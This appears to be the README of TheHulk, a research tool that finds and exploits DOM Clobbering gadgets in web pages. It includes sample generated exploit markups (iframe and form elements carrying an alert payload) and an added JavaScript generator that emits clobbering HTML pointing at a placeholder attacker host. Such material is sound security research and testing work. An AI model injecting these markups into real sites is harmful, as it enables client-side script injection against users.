TheHulk is a dynamic analysis tool designed to detect and exploit DOM Clobbering vulnerabilities.
TheHulk operates in three key phases:

- Gadget Detection with Dynamic Taint Analysis: TheHulk performs dynamic taint analysis in the browser to track dangerous data flows at runtime for a given input URL.
- Exploit Generation with Symbolic DOM: using the taint traces recorded in the first phase, TheHulk collects and solves the constraints along each trace to generate DOM-clobberable HTML markups as exploits.
- Exploit Verification: TheHulk injects the generated HTML payload into the target web page and hooks the dangerous sinks to verify exploitability.
To install TheHulk, follow these steps:

- Clone the repository together with its submodules:
git clone --recursive https://github.com/jackfromeast/TheHulk.git
- Run the installation script:
cd TheHulk && ./install.sh
- Install the mitmproxy certificate: to instrument HTTPS traffic with mitmproxy, install mitmproxy's CA certificate in your system trust store and in the browser (Chrome) so that intercepted sites do not raise untrusted-certificate errors. Follow: https://docs.mitmproxy.org/stable/concepts-certificates/#:~:text=chrome
- Basic check of the installation:
./tasks/ae-run-basic-check/run.sh
TheHulk can be run in two modes: as a standalone module or as a pipeline task.
Running TheHulk with Tasks
Tasks help you define the input, output, and configuration of an analysis task for better pipeline orchestration. A typical task directory includes the following components:

- input folder: holds the list of URLs for analysis.
- output folder: stores the analysis results for each site or page.
- callbacks folder: contains JavaScript-defined callback functions that the crawler invokes during execution.
- config.browser.yml file: configuration file for the taint analysis engine.
- config.scheduler.yml file: configuration file for the crawler.
- run.sh file: entry-point script that starts the task.
For example, to detect and exploit the gadgets in the DOM Clobbering Collection, you could simply:

- Update the two configuration files located at tasks/ae-run-gadget-detection-e1:
  - 1-1. Update the WORKSPACE path to specify where the output folders will be placed.
  - 1-2. Configure the inputs, browser configs and callbacks if necessary (can be skipped).
- Start the task:
./tasks/ae-run-gadget-detection-e1/run.sh
Running Dynamic Taint Engine Only

Although TheHulk is designed to detect DOM Clobbering gadgets, its dynamic taint engine can be generalized to detect other client-side vulnerabilities. The source code of the taint engine is located at gadget-detection/runtime-analysis/src.

- Update the configuration file located at gadget-detection/browser/config.browser.yml:
  - 1-1. Update the WORKSPACE path to specify where the output folders will be placed.
  - 1-2. Configure the inputs, browser configs and callbacks if necessary (can be skipped).
- Start the taint-aware browser:
./gadget-detection/run.sh

Note: you can adjust the '--force-device-scale-factor=1.75' argument in the configuration file to change the browser's display scaling. This setting gives a comfortable zoom for reading source code in the developer tools, but it might be too large for viewing web pages; adjust it as necessary for your display.
Running Exploit Generation Module Only

To generate DOM-clobberable HTML markups from a recorded taint trace, run:
node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json
Below is a screenshot of an analysis result for detecting a DOM Clobbering gadget in the Google Client API Library.
The exploit generation output:
$ node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json -c exploit-gen/src/tests/motivating-example-conditions.json
====================
<embed name="scripts">
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
<form name="scripts"></form>
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
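The candidate markups above follow from a handful of standard rules for how element ids and names resolve in the DOM. The generator below is an added illustration written for this page, not TheHulk's exploit-gen module: it takes a dotted global access path (the kind of access a taint trace records) and emits the well-known id/name clobbering markups for one-, two- and three-level chains. The access paths and the attacker URL `https://attacker.example/` are constructed inputs; TheHulk's constraint solving over the trace and conditions file is not reproduced here.

```javascript
// Added example, not TheHulk's own exploit-gen code: a small rule-based
// generator of DOM Clobbering markups for a dotted global access path.
// It encodes the three standard mechanisms a Symbolic DOM must model:
//   1. any element's `id` (and the `name` of embed/form/iframe/img/object)
//      becomes a named property of `window`;
//   2. two or more elements sharing that name turn `window.X` into an
//      HTMLCollection, reachable by index or by a second element's `name`;
//   3. a <form>'s listed controls are reachable as named form properties.
// Deeper chains (which need iframe/srcdoc tricks) return no candidate rather
// than a guessed one.

const DEFAULT_HREF = 'https://attacker.example/'; // constructed payload value

function escapeAttr(v) {
  return String(v).replace(/&/g, '&amp;').replace(/"/g, '&quot;');
}

// "window.scripts[0].src" -> ["scripts", "0", "src"]. A leading
// window/self/globalThis is dropped; quoted and numeric bracket keys are accepted.
function parsePath(path) {
  const re = /\.?([A-Za-z_$][\w$]*)|\[(?:"([^"]*)"|'([^']*)'|(\d+))\]/g;
  const parts = [];
  let consumed = 0;
  let m;
  while ((m = re.exec(path)) !== null) {
    if (m.index !== consumed) break; // gap between tokens: malformed path
    consumed = re.lastIndex;
    parts.push(m[1] ?? m[2] ?? m[3] ?? m[4]);
  }
  if (consumed !== path.length) throw new Error(`cannot parse access path: ${path}`);
  if (['window', 'self', 'globalThis'].includes(parts[0])) parts.shift();
  if (parts.length === 0) throw new Error(`empty access path: ${path}`);
  return parts;
}

const isIndex = (s) => /^\d+$/.test(s);
const anchor = (id, extra = '') => `<a id="${escapeAttr(id)}"${extra}></a>`;
const hrefAttr = (href) => ` href="${escapeAttr(href)}"`;

// Candidate markups for `path`. `stringifies` says whether the clobbered value
// coerces to `href` (only <a>/<area> have a URL stringifier), which is what a
// string sink such as script.src or innerHTML would receive; a non-stringifying
// candidate still serves gadgets that only test the value for truthiness.
function generateMarkups(path, href = DEFAULT_HREF) {
  const [x, y, z, ...rest] = parsePath(path);
  const out = [];
  if (y === undefined) {
    // window.X
    out.push({ markup: anchor(x, hrefAttr(href)), stringifies: true });
    out.push({ markup: `<form name="${escapeAttr(x)}"></form>`, stringifies: false });
  } else if (z === undefined && isIndex(y)) {
    // window.X[k]: pad the HTMLCollection so the payload element sits at index k
    const k = Number(y);
    const els = Array.from({ length: Math.max(k + 1, 2) }, (_, i) =>
      anchor(x, i === k ? hrefAttr(href) : ''));
    out.push({ markup: els.join(''), stringifies: true });
  } else if (z === undefined) {
    // window.X.Y: named access on the HTMLCollection, or a named form control
    out.push({ markup: anchor(x) + anchor(x, ` name="${escapeAttr(y)}"` + hrefAttr(href)),
               stringifies: true });
    out.push({ markup: `<form id="${escapeAttr(x)}"><input name="${escapeAttr(y)}"></form>`,
               stringifies: false });
  } else if (rest.length === 0 && !isIndex(y) && !isIndex(z)) {
    // window.X.Y.Z: collection -> form named Y -> control with id Z
    out.push({
      markup: `<form id="${escapeAttr(x)}"></form>` +
        `<form id="${escapeAttr(x)}" name="${escapeAttr(y)}"><input id="${escapeAttr(z)}"></form>`,
      stringifies: false,
    });
  }
  return out; // [] means: no id/name-only markup known for this access depth
}

// Stand-alone usage on a few constructed access paths.
for (const p of ['window.scripts[0]', 'window.cfg.url', 'a.b.c', 'a.b.c.d']) {
  console.log(p, generateMarkups(p));
}
```

Anything this emits still needs browser verification, which is what TheHulk's third phase does: an id that collides with an existing Window property or with a global declared by a script cannot be clobbered, and a gadget that reads the value before the injected markup has been parsed will not see it.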
The DOM Clobbering Collection is a list of widely used client-side libraries with DOM Clobbering gadgets found by TheHulk.
The dataset is available at https://github.com/jackfromeast/dom-clobbering-collection.